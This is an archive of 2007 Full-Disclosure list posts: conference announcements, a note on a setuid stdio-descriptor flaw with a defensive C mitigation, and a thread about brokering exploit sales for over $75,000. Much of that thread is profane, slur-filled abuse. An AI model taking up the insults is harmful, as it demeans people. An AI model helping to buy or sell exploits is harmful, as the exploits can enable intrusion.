Video Conferencing Security - Navid Jam, Sandia National Laboratories
Software Virtualization Based Rootkits - Sun Bing
VoIP Attacks! - Dustin D. Trammell, TippingPoint
Windows Vista Exploitation Countermeasures - Richard Johnston, Microsoft
OSX Security - Daniel Cuthbert, Corsaire
Distributed drone-based malware propagation and deployment automation - Emmanuel H

We have added a new RFID dojo in London with Adam, and Nico 
has a new VoIP Security dojo amongst the new dojos to be announced
for CanSecWest along with the paper selections. Dojos for London 
have final schedules now.

cheers,
--dr

-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
London, U.K.    Mar 1-2 - 2007    http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp



[Full-disclosure] DIMVA 2007: Final Call for Papers

2007-01-18 Thread Robin Sommer
Dear Colleagues,

this is the final Call for Papers for DIMVA 2007, the Fourth GI
International Conference on Detection of Intrusions & Malware, and
Vulnerability Assessment, which will be held in Lucerne,
Switzerland, on July 12-13, 2007.

Paper submission is now open at http://www.dimva.org/dimva2007. We
invite submissions of regular papers and short papers. The deadline
for both types of submissions is February 9, 2007.

Please feel free to distribute this announcement. We apologize if
you receive multiple copies of this message. 

Best Regards,

The DIMVA 2007 Organizing Committee

---

  CALL FOR PAPERS

DIMVA 2007

   Fourth GI International Conference on
  Detection of Intrusions & Malware, and Vulnerability Assessment

 Organized by the GI Special Interest Group SIDAR 

In Cooperation with
 IEEE Computer Society Task Force on Information Assurance

   Lucerne, Switzerland
July 12 - 13, 2007

  http://www.dimva.org/dimva2007
   mailto:[EMAIL PROTECTED]

---

The annual DIMVA conference serves as a premier forum for advancing the
state of the art in intrusion detection, malware detection, and
vulnerability assessment. Each year DIMVA brings together international
experts from academia, industry and government to present and discuss
novel research in these areas. DIMVA is organized by the special interest
group Security - Intrusion Detection and Response of the German
Informatics Society (GI). The conference proceedings will appear in
Springer's Lecture Notes in Computer Science (LNCS) series.

DIMVA solicits submission of high-quality, original scientific work. This
year we invite two types of paper submissions:

- Full papers, presenting novel and mature research results. Full papers
  are limited to 20 pages, prepared according to the instructions
  provided below. They will be reviewed by the program committee, and
  papers accepted for presentation at the conference will be included in
  the proceedings.

- Short papers (extended abstracts), presenting original, still ongoing
  work that has not yet reached the maturity required for a full paper.
  Short papers are limited to 10 pages, prepared according to the
  instructions provided below. They will also be reviewed by the program
  committee, and papers accepted for presentation at the conference will
  be included in the proceedings (containing Extended Abstract in the
  title).

DIMVA's scope includes, but is not restricted to the following areas:

- Intrusion Detection
  * Approaches
  * Implementations
  * Prevention and response
  * Result correlation
  * Evaluation
  * Potentials and limitations
  * Operational experiences
  * Evasion and other attacks
  * Legal and social aspects

- Malware
  * Techniques
  * Detection
  * Prevention
  * Evaluation
  * Trends and upcoming risks
  * Forensics and recovery

- Vulnerability Assessment
  * Vulnerabilities
  * Vulnerability detection
  * Vulnerability prevention

DIMVA particularly encourages papers that discuss the integration of
intrusion, malware, and vulnerability detection in large-scale
operational communication networks. 


ORGANIZING COMMITTEE


General Chair: Bernhard Hämmerli, HTA Luzern
   [EMAIL PROTECTED]
   
Program Chair: Robin Sommer, LBNL/ICSI 
   [EMAIL PROTECTED]
 
Sponsor Chair: Dirk Schadt
   [EMAIL PROTECTED]


PROGRAM COMMITTEE
-

Roland Büschkes, RWE (DE)
Weidong Cui, Microsoft Research (US)
Marc Dacier, Eurécom (FR)
Hervé Debar, France Télécom (FR)
Sven Dietrich, Carnegie Mellon University (US)
Toralv Dirro, McAfee (DE)
Holger Dreger, Siemens CERT (DE)
Mohamed Eltoweissy, Virginia Tech (US)
Ulrich Flegel, University of Dortmund (DE)
Felix C. Freiling, University of Mannheim (DE)
Dirk Häger, BSI (DE)
Bernhard Hämmerli, HTA Lucerne (CH)
Marc Heuse, n.runs (DE)
Ming-Yuh Huang, Boeing (US)
Erland Jonsson, Chalmers University (SE)
Klaus Julisch, IBM Research (US)
Angelos Keromytis, Columbia University (US)
Hartmut König, BTU Cottbus (DE)
Christian Kreibich, ICSI (US)
Christopher Kruegel, TU Vienna (AT)
Pavel Laskov, Fraunhofer FIRST (DE)
Wenke Lee, Georgia Tech (US)
Jun Li, Tsinghua University (CN)
Javier Lopez, University of Malaga (ES)
John McHugh, Dalhousie University (CA)
Michael Meier, University of Dortmund (DE)
R. Sekar, Stony Brook University (US)
Roberto Setola, Univ. CAMPUS Bio-Medico Rome (IT)
Doug Tygar, UC Berkeley (US)
Giovanni Vigna, UC Santa Barbara (US)
Stephen Wolthusen, University of London (GB)
S. Felix Wu, UC Davis (US)


IMPORTANT DATES
---

February 9, 2007   

Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Roman Medina-Heigl Hernandez
Then you cannot assure that your buyer will make an ethical use of the
exploit. So what's the real difference from selling it to other people
(known or unknown, where unknown could be black-hats, script-kiddies or
whoever making the higher bid)? The receipt? :) I mean, if I (as a
researcher) don't mind what the exploit will be used for, I'd simply look
for the higher bidder (I guess).

And you didn't really answer my former two questions... Please, could you
provide some specific examples of typical ways to justify ROI? Which is the
typical profile/s of enterprise/s buying exploits? (without naming
particular enterprises, of course).



Simon Smith wrote:
> Oh,
> About your ROI question, that varies per buyer. I am not usually told
> about why a buyer needs something as that's none of my business.
>
> On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
> wrote:
>
>> Simon Smith wrote:
>>> Amen!
>>> KF is 100% on the money. I can arrange the legitimate purchase of most
>>> working exploits for significantly more money than iDefense, In some cases
>>> over $75,000.00 per purchase. The company that I am working with has a
>>> relationship with a legitimate buyer, all transactions are legal. If you're
>> <naive>
>>
>> I was wondering which kind of (legal) enterprises/organizations would pay
>> $75000 for a simple (or not so simple) exploit.
>> - governmental organizations (defense? DoD? FBI? ...)
>> - firms offering high-profiled pen-testing services?
>> - ... ?
>>
>> What about the ROI for such investment?
>>
>> </naive>
>>
>> Regards,
>> -Roman

 
 

-- 

Saludos,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Just wanted to let everyone know that I've updated the blog to reflect new
changes. You can see the changes at http://snosoft.blogspot.com.


On 1/18/07 2:27 PM, Simon Smith [EMAIL PROTECTED] wrote:

> Oh,
> About your ROI question, that varies per buyer. I am not usually told
> about why a buyer needs something as that's none of my business.
>
> On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
> wrote:
>
>> Simon Smith wrote:
>>> Amen!
>>> KF is 100% on the money. I can arrange the legitimate purchase of most
>>> working exploits for significantly more money than iDefense, In some cases
>>> over $75,000.00 per purchase. The company that I am working with has a
>>> relationship with a legitimate buyer, all transactions are legal. If you're
>>
>> <naive>
>>
>> I was wondering which kind of (legal) enterprises/organizations would pay
>> $75000 for a simple (or not so simple) exploit.
>> - governmental organizations (defense? DoD? FBI? ...)
>> - firms offering high-profiled pen-testing services?
>> - ... ?
>>
>> What about the ROI for such investment?
>>
>> </naive>
>>
>> Regards,
>> -Roman
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Multiple OS kernel insecure handling of stdio file descriptor

2007-01-18 Thread Peter Jeremy
On 2007-Jan-18 22:21:52 +0800, XFOCUS Security Team [EMAIL PROTECTED] wrote:
The affected OSes allow local users to write to or read from restricted
files by closing the file descriptors 0 (standard input), 1 (standard
output), or 2 (standard error), which may then be reused by a called
setuid process that intended to perform I/O on normal files. The attack
which exploits this vulnerability can possibly get root rights.

This vulnerability has been known for years.  OpenBSD implemented a
kernel check to block this attack in 1998.  FreeBSD and NetBSD have
similar kernel checks and I believe glibc also has checks to block
this.  It is disturbing that none of the commercial OS vendors appear
to have bothered to protect against this.

-- 
Peter Jeremy
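
The check this reply refers to, sketched in userland as an added example (not code from the post, from OpenBSD, or from glibc): before opening any file of its own, a privileged program makes sure descriptors 0, 1 and 2 are occupied, binding any closed one to /dev/null. The function names `ensure_std_fds` and `fd_after_close` are hypothetical.

```c
/* Added example (not from the post): userland check that descriptors 0-2
 * are open before a privileged program opens any file of its own. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Why the check matters: open() returns the lowest-numbered free descriptor.
 * With `fd` closed by the caller, the next file the program opens lands on it,
 * so later writes to "stderr" or reads from "stdin" hit that file instead.
 * Returns the number a fresh open() receives while `fd` is closed, restoring
 * the original descriptor afterwards; -1 on error.
 */
int fd_after_close(int fd)
{
    int saved = fcntl(fd, F_DUPFD, 3);   /* park a copy above the stdio range */
    if (saved < 0)
        return -1;
    close(fd);
    int got = open("/dev/null", O_RDWR);
    if (got >= 0)
        close(got);
    int rc = dup2(saved, fd);            /* put the original back */
    close(saved);
    return rc < 0 ? -1 : got;
}

/*
 * The mitigation: walk 0, 1, 2 in ascending order and bind every closed slot
 * to /dev/null. Because lower slots are already filled when a gap is found,
 * open() must return exactly that slot; anything else means the descriptor
 * table changed underneath us, so fail closed.
 * Returns the number of descriptors repaired, or -1 on error.
 */
int ensure_std_fds(void)
{
    int repaired = 0;

    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1)
            continue;                    /* slot is open, nothing to do */
        if (errno != EBADF)
            return -1;                   /* unexpected failure */

        int nfd = open("/dev/null", O_RDWR);
        if (nfd < 0)
            return -1;
        if (nfd != fd) {
            close(nfd);
            return -1;
        }
        repaired++;
    }
    return repaired;
}

int main(void)
{
    /* First statement of a setuid/setgid program, before any other open(). */
    if (ensure_std_fds() < 0)
        _exit(127);

    printf("with fd 2 closed, the next open() would return %d\n",
           fd_after_close(2));
    return 0;
}
```

A kernel-side check, as the reply describes for the BSDs, covers every setuid binary at once; the userland form only protects programs that call it first thing.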



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread auto178855
This is complete bullshit nothing more than a social engineering 
honey pot to get bugs and vulns for their own use, this company 
couldn't afford 75.ooo USD if they tried, they cannot even find 
their own bugs, they got 4 or 5 shitty research and vuln 
findings of their own, that's it.

75.000 for a remote vista ie7 xploit, guaranteed you won't find it 
and if you do they won't pay

lose lose :(

jigga

yo


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Olivier Meyer
How do you know the vuln won't be re-sold?



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Nobody ever said that 75,000.00 was a price for a remote vista bug.




Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread auto178855
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up 
to 75 for the same. YOUR WORDS FUCKFACE

ST00PID LYING CUNT!

I can arrange the legitimate purchase of most 
working exploits for significantly more money than iDefense, In 
some cases 
over $75,000.00 per purchase.

 
Re: [Full-disclosure] iDefense Q-1 2007 Challenge

From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST 
know someone who will pay significantly more per vulnerability 
against the 
same targets. 



On 1/10/07 12:27 PM, contributor Contributoridefense.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Also available at:
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge

 *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
 Vista  IE 7.0*





Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Sure he did ivan...



On 1/19/07 12:53 AM, Ivan . [EMAIL PROTECTED] wrote:

 75.000 for a remote vista ie7 xploit,




Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Roman and List, 
Let me address this issue once and for all, because the issue is
really quite simple. I am offering security researchers the ability to have
their exploits legally purchased for a price that is higher than the
standard prices offered by the majority of third parties. The researchers
who decide to participate will be sent a legally binding contract. This
contract will specifically protect the researcher and buyer and clearly
spell out the terms and conditions of business.
  
And as for Roman's argument, I can assure him (and all of you) that the
exploit code will be put to ethical, legitimate and legal use. The only
people that will be using the exploit code are established U.S. based public
or private sector corporations/parties. Other than that I am not going to
get into a debate about it.

Lastly, it amazes me that so many people complain about the prices that
they sell their exploits for, then, when someone like me comes around to try
to give them fair pricing in a legal way, they'd rather complain about that
than take up the opportunity. This reminds me of old women who are always
trying to find a reason to complain. Nothing more than a bunch of grumpy old
women. ;]

On 1/18/07 7:53 PM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED]
wrote:

 Then you cannot assure that your buyer will make an ethical use of the
 exploit. So what's the real difference against selling it to another people
 (known or unknown, where unknown could be black-hats, script-kiddies or
 whoever making the higher bid)? The receipt? :) I mean, if I (as a
 researcher) don't mind what the exploit will be used for, I'd simply look
 for the higher bidder (I guess).
 
 And you didn't really answer my former two questions... Please, could you
 provide some specific examples of typical ways to justify ROI? Which is the
 typical profile/s of enterprise/s buying exploits? (without naming
 particular enterprises, of course).
 
 
 


Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Dear NoBalls, 
What specifically is a fuckface anyway and why are you hiding behind
an anonymous email account?

More importantly, my words were not:

SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
to 75 for the same.

Hell that sentence doesn't even make any sense! What the heck does much for
up to 75 for the same even mean?

My EXACT words were:

Amen!
KF is 100% on the money. I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In some cases
over $75,000.00 per purchase. The company that I am working with has a
relationship with a legitimate buyer, all transactions are legal. If you're
interested contact me and we'll get the ball rolling.

-Simon
   

$8000.00 USD is low!

-End of my words- 

;]





Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread auto178855
Number one:

1. An affidavit from your solicitors or accountant's that 
USD750.000 has ever been dispensed through your company or your 
proxy company

2. An affidavit from your solicitor's or accountants, that you, 
your so-called client (who is you sno shit) have ever paid out 
up to 750.ooo usd {citing in some cases}

PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU TRIED.

PROOF EVERY ONE WRONG LOUD MOUTH.



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
Dumbass, you must be a part of the n3td3v ccr3w or something.

How did you go from 75,000 to 750,000?




Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread auto178855
typical con artist - wrong focus FUCKFACE

PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCOUNTANT. EVEN ONE NICKEL 
GIVEN FOR A VULN. LET ALONE 750 MILLION.



Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Simon Smith
You're right... I'll start ignoring you now. ;)




Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread auto178855
Of course you will, the company you sell to never found more
than 4 vulns in their existence.

You're the cheap sales man selling insurance, where's your
USD750.ooo vuln EXPERT VULN GUY ?

Nowhere, and neither the shithole company, which is yours, ever
passed even 1 USD through your company if you can even call it that;


RE-REQUEST. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
SUCCESSFULLY TRANSACTED EVEN ONE DEAL IN THIS FRAME,

RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR PROXY
COMPANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITTEN BY YOU ON FD
STATING SO.

YOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
AND RECONFIRM YOU AND YOUR '[AFFILIATES]' ARE FRAUDS



On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED] 
wrote:
You're right... I'll start ignoring you now. ;)


On 1/19/07 1:50 AM, [EMAIL PROTECTED] 
[EMAIL PROTECTED]
wrote:

 typical con artist - wrong focus FUCKFACE
 
 PROVE YOUR BONA FIDES VIA .LAWYER OR .ACCOUNTANT. EVEN ONE NICKEL
 GIVEN FOR A VULN. LET ALONE 750 MILLION.
 
 On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith 
[EMAIL PROTECTED]
 wrote:
 Dumbass, you must be a part of the n3td3v ccr3w or something.
 
 How did you go from 75,000 to 750,000?
 
 
 On 1/19/07 1:38 AM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 Number one:
 
 1. An affidavit from your solicitors or accountants that
 USD750.000 has ever been dispensed through your company or your
 proxy company
 
 2. An affidavit from your solicitors or accountants, that you,
 your so-called client (who is you sno shit) have ever paid out
 up to 750.ooo usd {citing in some cases}
 
 PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
 TRIED.
 
 PROVE EVERYONE WRONG LOUD MOUTH.
 
 On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 Dear NoBalls,
 What specifically is a fuckface anyway and why are you hiding behind
 an anonymous email account?
 
 More importantly, my words were not:
 
 SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
 to 75 for the same.
 
 Hell that sentence doesn't even make any sense! What the heck does
 much for up to 75 for the same even mean?
 
 My EXACT words were:
 
 Amen!
 KF is 100% on the money. I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase. The company that I am working with has a
 relationship with a legitimate buyer, all transactions are legal. If you're
 interested contact me and we'll get the ball rolling.
 
 -Simon
   
 
$8000.00 USD is low!
 
 -End of my words-
 
 ;]
 
 
 
 On 1/19/07 1:05 AM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
 to 75 for the same. YOUR WORDS FUCKFACE
 
 ST00PID LYING CUNT!
 
 I can arrange the legitimate purchase of most
 working exploits for significantly more money than iDefense, In some cases
 over $75,000.00 per purchase.
 
  
 Re: [Full-disclosure] iDefense Q-1 2007 Challenge
 
 From: Simon Smith (simonsnosoft.com)
 Date: Tue Jan 16 2007 - 11:14:56 CST
 know someone who will pay significantly more per vulnerability
 against the same targets.
 
 
 
 On 1/10/07 12:27 PM, contributor Contributoridefense.com
 wrote:
 
 
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1 
   
 Also available at:
 http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
 *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
 Vista  IE 7.0*
 
 
 
 On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
 [EMAIL PROTECTED]
 wrote:
 Nobody ever said that 75,000.00 was a price for a remote vista bug.
 
 
 On 1/18/07 8:39 PM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
 This is complete bullshit nothing more than a social engineering
 honey pot to get bugs and vulns for their own use, this company
 couldn't afford 75.ooo USD if they tried, they cannot even find
 their own bugs, they got 4 or 5 shitty research and vuln
 findings of their own, that's it.
 
 75.000 for a remote vista ie7 xploit, guaranteed you won't find it
 and if you do they won't pay
 
 lose lose :(
 
 jigga
 
 yo
 
 
 
 
 
 
 

Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Stan Bubrouski
Stick to beer, hard liquor seems to make you an angry drunk.

-sb

On 1/19/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 Of course you will, the company you sell to never found more
 than 4 vulns in their existence.

 You're the cheap sales man selling insurance, where's your
 USD750.ooo vuln EXPERT VULN GUY ?

 Nowhere, and neither the shithole company, which is yours, ever
 passed even 1 USD through your company if you can even call it that;


 RE-REQUEST. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
 SUCCESSFULLY TRANSACTED EVEN ONE DEAL IN THIS FRAME,

 RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR PROXY
 COMPANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
 USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITTEN BY YOU ON FD
 STATING SO.

 YOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
 AND RECONFIRM YOU AND YOUR '[AFFILIATES]' ARE FRAUDS



 On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED]
 wrote:
 You're right... I'll start ignoring you now. ;)
 
 
 On 1/19/07 1:50 AM, [EMAIL PROTECTED]
 [EMAIL PROTECTED]
 wrote:
 
  typical con artist - wrong focus FUCKFACE
 
  PROVE YOUR BONA FIDES VIA .LAWYER OR .ACCOUNTANT. EVEN ONE NICKEL
  GIVEN FOR A VULN. LET ALONE 750 MILLION.
 
  On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith
 [EMAIL PROTECTED]
  wrote:
  Dumbass, you must be a part of the n3td3v ccr3w or something.
 
  How did you go from 75,000 to 750,000?
 
 
  On 1/19/07 1:38 AM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  Number one:
 
  1. An affidavit from your solicitors or accountants that
  USD750.000 has ever been dispensed through your company or your
  proxy company
 
  2. An affidavit from your solicitors or accountants, that you,
  your so-called client (who is you sno shit) have ever paid out
  up to 750.ooo usd {citing in some cases}
 
  PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
  TRIED.
 
  PROVE EVERYONE WRONG LOUD MOUTH.
 
  On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
  [EMAIL PROTECTED]
  wrote:
  Dear NoBalls,
  What specifically is a fuckface anyway and why are you hiding behind
  an anonymous email account?
 
  More importantly, my words were not:
 
  SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
  to 75 for the same.
 
  Hell that sentence doesn't even make any sense! What the heck does
  much for up to 75 for the same even mean?
 
  My EXACT words were:
 
  Amen!
  KF is 100% on the money. I can arrange the legitimate purchase of most
  working exploits for significantly more money than iDefense, In some cases
  over $75,000.00 per purchase. The company that I am working with has a
  relationship with a legitimate buyer, all transactions are legal. If you're
  interested contact me and we'll get the ball rolling.
 
  -Simon
 
 
 $8000.00 USD is low!
 
  -End of my words-
 
  ;]
 
 
 
  On 1/19/07 1:05 AM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up
  to 75 for the same. YOUR WORDS FUCKFACE
 
  ST00PID LYING CUNT!
 
  I can arrange the legitimate purchase of most
  working exploits for significantly more money than iDefense, In some cases
  over $75,000.00 per purchase.
 
  
  Re: [Full-disclosure] iDefense Q-1 2007 Challenge
 
  From: Simon Smith (simonsnosoft.com)
  Date: Tue Jan 16 2007 - 11:14:56 CST
  know someone who will pay significantly more per vulnerability
  against the same targets.
 
 
 
  On 1/10/07 12:27 PM, contributor Contributoridefense.com
  wrote:
 
 
 
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Also available at:
  http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+challenge
 
  *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in
  Vista  IE 7.0*
 
  
 
  On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
  [EMAIL PROTECTED]
  wrote:
  Nobody ever said that 75,000.00 was a price for a remote vista bug.
 
 
  On 1/18/07 8:39 PM, [EMAIL PROTECTED]
  [EMAIL PROTECTED]
  wrote:
 
  This is complete bullshit nothing more than a social engineering
  honey pot to get bugs and vulns for their own use, this company
  couldn't afford 75.ooo USD if they tried, they cannot even find
  their own bugs, they got 4 or 5 shitty research and vuln
  findings of their own, that's it.
 
  75.000 for a remote vista ie7 xploit, guaranteed you won't find it
  and if you do they won't pay
 
  lose lose :(
 
  jigga
 
  yo
 
 
 
 
 
 